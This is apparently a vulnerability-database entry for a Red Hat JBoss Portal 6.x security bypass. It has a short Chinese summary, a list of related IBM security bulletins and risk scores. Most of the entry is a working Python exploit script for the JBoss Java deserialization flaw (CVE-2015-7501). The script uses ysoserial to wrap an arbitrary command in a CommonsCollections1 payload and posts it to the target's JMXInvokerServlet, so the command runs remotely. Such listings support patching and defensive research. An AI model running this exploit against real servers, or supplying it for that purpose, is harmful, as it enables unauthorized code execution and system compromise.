Red Hat JBoss Portal安全绕过漏洞

🗓️ 04 Dec 2015 00:00:00Reported by RootType

Red Hat JBoss Portal 6.x版本存在安全漏洞，允许绕过安全限

Reporter	Title	Published	Views	Family All 200
IBM Security Bulletins	Security Bulletin: Remediation of Multiple Apache Struts 1.1 Vulnerabilities in IBM Library Support for Struts	16 Jan 202609:15	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Cloud Pak for Security includes components with multiple known vulnerabilities	8 Jun 202321:56	–	ibm
IBM Security Bulletins	Security Bulletin: The IBM® Engineering Lifecycle Management is impacted by vulnerabilties in Apache Commons Collections	18 Oct 202401:43	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerabilities in Apache Commons Collections, Apache Synapse, Oracle WebLogic Server, MuleSoft and Red Hat JBoss might affect IBM Storage Copy Data Management.	24 Jan 202519:11	–	ibm
IBM Security Bulletins	Security Bulletin: Due to use of Apache Commons, IBM Operations Analytics - Log Analysis is affected by Improper Handling of Untrusted Input During Deserialization	9 Oct 202506:58	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities	19 Aug 201920:44	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Verify Governance is vulnerable to arbitrary code execution due to use of Apache Commons Collections (multiple vulnerabilities)	22 Nov 202216:37	–	ibm
IBM Security Bulletins	Security Bulletin: Remediation of Multiple Apache Struts Vulnerabilities in IBM Library Support for Struts	13 Mar 202617:06	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities including a remote code execution in Spring Framework (CVE-2022-22965)	11 Apr 202215:17	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in IBM Controller	13 Aug 202512:05	–	ibm


                                                #! /usr/bin/env python2

# Jboss Java Deserialization RCE (CVE-2015-7501)
# Made with <3 by @byt3bl33d3r

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import argparse
import sys, os
#from binascii import hexlify, unhexlify
from subprocess import check_output

ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
ysoserial_path = None

parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')

if len(sys.argv) < 2:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

if not args.ysoserial_path:
    for path in ysoserial_default_paths:
        if os.path.exists(path):
            ysoserial_path = path
else:
    if os.path.exists(args.ysoserial_path):
        ysoserial_path = args.ysoserial_path

if ysoserial_path is None:
    print '[-] Could not find ysoserial JAR file'
    sys.exit(1)

if len(args.target.split(":")) != 2:
    print '[-] Target must be in format IP:PORT'
    sys.exit(1)

if not args.command:
    print '[-] You must specify a command to run'
    sys.exit(1)

ip, port = args.target.split(':')

print '[*] Target IP: {}'.format(ip)
print '[*] Target PORT: {}'.format(port)

gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])

r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)

if r.status_code == 200:
    print '[+] Command executed successfully'

04 Dec 2015 00:00Current

9.4High risk

Vulners AI Score9.4

EPSS0.83274